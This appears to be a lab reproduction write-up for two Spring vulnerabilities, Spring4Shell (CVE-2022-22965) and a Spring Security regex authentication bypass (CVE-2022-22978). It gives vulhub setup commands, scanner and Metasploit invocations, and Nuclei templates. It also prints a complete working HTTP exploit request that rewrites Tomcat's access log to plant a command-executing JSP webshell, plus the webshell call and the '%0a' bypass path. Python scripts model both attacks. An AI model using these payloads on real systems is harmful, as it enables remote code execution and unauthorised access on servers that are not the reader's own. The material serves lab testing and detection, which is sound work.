- 31 March 2022: Spring releases Spring Framework 5.3.18 and 5.2.20.RELEASE and identifies the issue as CVE-2022-22965; several security vendors publish advisories confirming it.
- 1 April 2022: given its severity, the vulnerability is dubbed "Spring4Shell" abroad.

**Affected versions.** Spring Framework 5.3.x before 5.3.18 and 5.2.x before 5.2.20, and products derived from them, when running on JDK ≥ 9 / JRE ≥ 9. Other out-of-support versions are affected as well.

## Environment setup

```bash
cd vulhub-master/spring/CVE-2022-22965
docker-compose up -d
docker ps
# tear down when finished
docker-compose down
```

## Discovery

SpringBootExploit and Spring_All_Reachable do not support this vulnerability.

### Nuclei ✅

### SpringBoot-Scan ✅

Project: https://github.com/AabyssZG/SpringBoot-Scan

```bash
# exploit a single URL
python ./SpringBoot-Scan.py -v http://192.168.229.140:8080/ -v --vul
```

### MSF ❌

```
search CVE-2022-22965
use exploit/multi/http/spring_framework_rce_spring4shell
set RHOSTS 192.168.229.140
set LHOST 192.168.229.128
set RPORT 8080
set ForceExploit true
exploit
```

### Third-party tool 1 (detection) ✅

Source: https://github.com/fullhunt/spring4shell-scan

```bash
# scan a single URL
python3 spring4shell-scan.py -u http://192.168.229.140:8080/
# try the WAF-bypass payloads against the target
python3 spring4shell-scan.py -u http://192.168.229.140:8080/ --waf-bypass
# scan a list of URLs
python3 spring4shell-scan.py -l urls.txt
# also test for the Spring Cloud Function RCE (CVE-2022-22963)
python3 spring4shell-scan.py -l urls.txt --test-CVE-2022-22963
```

### Third-party tool 2 (exploitation) ✅

Source: https://github.com/crow821/crowsec/tree/master/Spring_RCE_CVE-2022-22965 (vulhub_CVE-2022-22965_poc.py)

### Third-party tool 3 (exploitation) ✅

Source: https://github.com/zangcc/CVE-2022-22965-rexbb
Usage: https://blog.csdn.net/weixin_43847838/article/details/128475095

## Verification and exploitation

The request below reconfigures Tomcat's access log through the `class.module.classLoader.resources.context.parent.pipeline.first.*` properties: the log directory becomes the webroot, the file name `tomcatwar.jsp`, and the log *pattern* becomes JSP source. Every request is then logged into a file that Tomcat serves as a JSP. The `%{c1}i`, `%{c2}i` and `%{suffix}i` directives expand to the request headers of the same name, which is how `Runtime`, `<%` and `%>` get into the file without appearing in the URL.

```http
GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1
Host: 192.168.229.140:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
suffix: %>//
c1: Runtime
c2: <%
DNT: 1

```

Then call the JSP webshell that was just written and run a command:

```
http://localhost:8080/tomcatwar.jsp?pwd=j&cmd=id
```

After exploitation, clear `class.module.classLoader.resources.context.parent.pipeline.first.pattern` again. Otherwise every further request appends another copy of the code to the JSP webshell and the file keeps growing. The following request sets the pattern to an empty string:

```http
GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern= HTTP/1.1
Host: 192.168.229.140:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close

```

## Warning

This exploitation method changes the target server's configuration, and the target must be restarted to recover. Take extra care in real tests. ThreatBook describes a non-destructive detection method in "Vulnerability notice | Spring Core remote code execution vulnerability exploited in the wild".

## Other

- NSFOCUS published "D-Eyes emergency-response tool, Spring vulnerability edition" for Windows and Linux; customers can obtain it from their local service contact. See also "[Vulnerability notice] Spring Framework remote code execution vulnerability (CVE-2022-22965) handling guide".
- WebRAY analysed the vulnerability further and released a self-check tool: https://github.com/webraybtl/springcore_detect ("Some thoughts on the Spring Framework RCE (CVE-2022-22965)").
- Qianxin released a fully offline detection tool, "Tiancan 3.0, Spring vulnerability offline edition"; it requires a Tianwen platform login ("[Tianwen] New: fully offline one-click check for the Spring Framework RCE | Xingtu Lab").
- Murphy Security open-sourced a tool for emergency triage: "Spring fixes remote command execution vulnerability in new release (CVE-2022-22965), Murphy Security open-source tool for emergency triage".

# CVE-2022-22978: VMware Spring Security authentication bypass

## Overview

**Root cause.** RegexRequestMatcher filters too loosely: the `.` in a regular expression does not match a line-break character, so a request URI that contains an encoded newline such as `%0a` is not matched by a rule like `/admin/.*`, and the configured access control does not apply to it. An unauthenticated attacker can craft such a URI and reach the protected resource.

**Affected versions.** Spring Security 5.5.x before 5.5.7 and 5.6.x before 5.6.4; other unsupported versions are affected as well.

Reference: https://ti.qianxin.com/vulnerability/detail/246090
Reproduction write-up: https://blog.csdn.net/zwy15288408160/article/details/131850711

## Environment setup

```bash
cd vulhub-master/spring/CVE-2022-22978
docker-compose up -d
docker ps
# tear down when finished
docker-compose down
```

## Discovery

None of the dedicated scanners detect this one.

### Nuclei ✅

I wrote a detection template. It only checks the response code, so false positives are possible:

```yaml
id: CVE-2022-22978

info:
  name: VMware Spring Security authentication bypass vulnerability
  author: lain
  severity: high
  description: VMware Spring Security authentication bypass vulnerability
  reference:
    - https://www.cnblogs.com/surgenry/articles/17303152.html
  tags: Spring

http:
  - method: GET
    path:
      - "{{RootURL}}/admin/index%0a"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
```

### Third-party tool 1 (detection) ✅

Source: https://blog.csdn.net/zwy15288408160/article/details/131850711

The tool requests `/admin/%0a%0d` and reports the target as vulnerable when the status is 200; this, too, can produce false positives.

## Verification and exploitation

Requesting `/admin/index` directly is refused. Requesting the path with the payload appended, `/admin/index%0a`, returns the admin page without logging in.
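What the five `class.module.classLoader...` parameters in the Spring4Shell section above actually do, as an added example that is neither vulhub's payload nor Tomcat code. It models only the two pieces of Tomcat's AccessLogValve that the exploit relies on: `%{name}i` in the log pattern expands to the request header of that name, and the log file is `directory/prefix + dateStamp + suffix`, where an empty `fileDateFormat` yields an empty dateStamp. The pattern, header values, file names and the cleanup request are the ones used above; `simulate()` shows why the pattern must be emptied afterwards.

```python
"""CVE-2022-22965: how the access-log properties turn request logging into a JSP webshell."""
import re
from urllib.parse import urlencode

VALVE = "class.module.classLoader.resources.context.parent.pipeline.first."

# Access-log pattern from the write-up. The parts that must not appear literally in
# the URL (<%, %>, Runtime) are referenced as headers via %{name}i.
PATTERN = ('%{c2}i if("j".equals(request.getParameter("pwd"))){ '
           'java.io.InputStream in = %{c1}i.getRuntime().exec(request.getParameter("cmd")).getInputStream(); '
           'int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } } '
           '%{suffix}i')
HEADERS = {"c1": "Runtime", "c2": "<%", "suffix": "%>//"}


def exploit_params(pattern=PATTERN, directory="webapps/ROOT", prefix="tomcatwar", suffix=".jsp"):
    """Query parameters that re-point the access log into the webroot as a .jsp file."""
    return {VALVE + "pattern": pattern,
            VALVE + "suffix": suffix,
            VALVE + "directory": directory,
            VALVE + "prefix": prefix,
            VALVE + "fileDateFormat": ""}


def cleanup_params():
    """Empty pattern: later requests no longer append another copy of the code."""
    return {VALVE + "pattern": ""}


def query_string(params):
    """Encode the parameters as they travel in the GET request (data binding reads them back)."""
    return urlencode(params)


HEADER_DIRECTIVE = re.compile(r"%\{([^}]*)\}i")


def render_log_line(pattern, request_headers):
    """Simplified AccessLogValve: %{name}i becomes the incoming header, '-' when absent.
    Other directives (%h, %t, ...) are left as-is; the payload does not use them."""
    return HEADER_DIRECTIVE.sub(lambda m: request_headers.get(m.group(1), "-"), pattern)


def log_file_name(params):
    """directory/prefix + dateStamp + suffix; an empty fileDateFormat gives no dateStamp,
    which is what makes the file name a fixed, predictable tomcatwar.jsp."""
    date_stamp = "" if params[VALVE + "fileDateFormat"] == "" else "<date>"
    return "%s/%s%s%s" % (params[VALVE + "directory"], params[VALVE + "prefix"],
                           date_stamp, params[VALVE + "suffix"])


def simulate(params, request_headers, existing=""):
    """Append one access-log line for a request, the way the valve does for every request
    while the pattern is set. `existing` is the current content of the log file."""
    return existing + render_log_line(params[VALVE + "pattern"], request_headers) + "\n"


if __name__ == "__main__":
    params = exploit_params()
    print("GET /?" + query_string(params))
    print("writes to", log_file_name(params))
    print(render_log_line(PATTERN, HEADERS))
    print("cleanup: GET /?" + query_string(cleanup_params()))
```

Two requests with the pattern set leave two copies of the JSP code in the file, which is why the write-up insists on the cleanup request; the header values are under the attacker's control per request, so a later request without the `c1`/`c2`/`suffix` headers would log `-` in their place and corrupt the page.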
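Why the `/admin/index%0a` request in the CVE-2022-22978 section above slips past the matcher, as an added example that is not Spring Security code. It models two Java behaviours in Python: `Pattern.matches` requires the whole input to match, and Java's default `.` does not match the line terminators `\n`, `\r`, `\u0085`, `\u2028` and `\u2029` unless `DOTALL` is set, which is the flag the fixed Spring Security releases compile the matcher's pattern with. The rule `/admin/.*` is an assumption about the lab application's configuration; the page only shows the bypass.

```python
"""CVE-2022-22978: a Java-faithful model of RegexRequestMatcher, vulnerable and fixed."""
import re
from urllib.parse import unquote

# Characters Java's '.' refuses to match without Pattern.DOTALL
JAVA_LINE_TERMINATORS = "\n\r\x85\u2028\u2029"


def _javaize(pattern, dotall):
    """Rewrite each unescaped '.' outside a character class so Python's re behaves like
    java.util.regex: with DOTALL it matches anything, otherwise it excludes Java's
    line terminators (Python's '.' only excludes '\\n'). Escaped dots and dots inside
    [...] are left untouched."""
    out, in_class, i = [], False, 0
    while i < len(pattern):
        ch = pattern[i]
        if ch == "\\" and i + 1 < len(pattern):
            out.append(pattern[i:i + 2])
            i += 2
            continue
        if ch == "[":
            in_class = True
        elif ch == "]":
            in_class = False
        elif ch == "." and not in_class:
            out.append("(?s:.)" if dotall else "[^" + JAVA_LINE_TERMINATORS + "]")
            i += 1
            continue
        out.append(ch)
        i += 1
    return "".join(out)


class RegexRequestMatcher:
    """Minimal model of Spring Security's matcher: the pattern must match the *entire*
    request URI (Pattern.matches), compiled without DOTALL in vulnerable releases."""

    def __init__(self, pattern, dotall=False):
        self._re = re.compile(_javaize(pattern, dotall))

    def matches(self, uri):
        return self._re.fullmatch(uri) is not None


def admin_rule_protects(raw_path, fixed=False):
    """True when an (assumed) rule protecting '/admin/.*' applies to the request. The servlet
    container percent-decodes the path before matching, so %0a arrives as a real newline."""
    return RegexRequestMatcher(r"/admin/.*", dotall=fixed).matches(unquote(raw_path))


if __name__ == "__main__":
    for path in ("/admin/index", "/admin/index%0a", "/admin/index%0d"):
        print("%-18s vulnerable: %-5s fixed: %s" % (
            path, admin_rule_protects(path), admin_rule_protects(path, fixed=True)))
```

The request is only unprotected, not un-routable: the application still dispatches `/admin/index\n` to the admin handler, which is what the 200 in the Nuclei template above detects. Any `RegexRequestMatcher` whose pattern contains `.` has the same gap, so when upgrading is not immediately possible, prefer the Ant-style matchers, which do not use regular expressions.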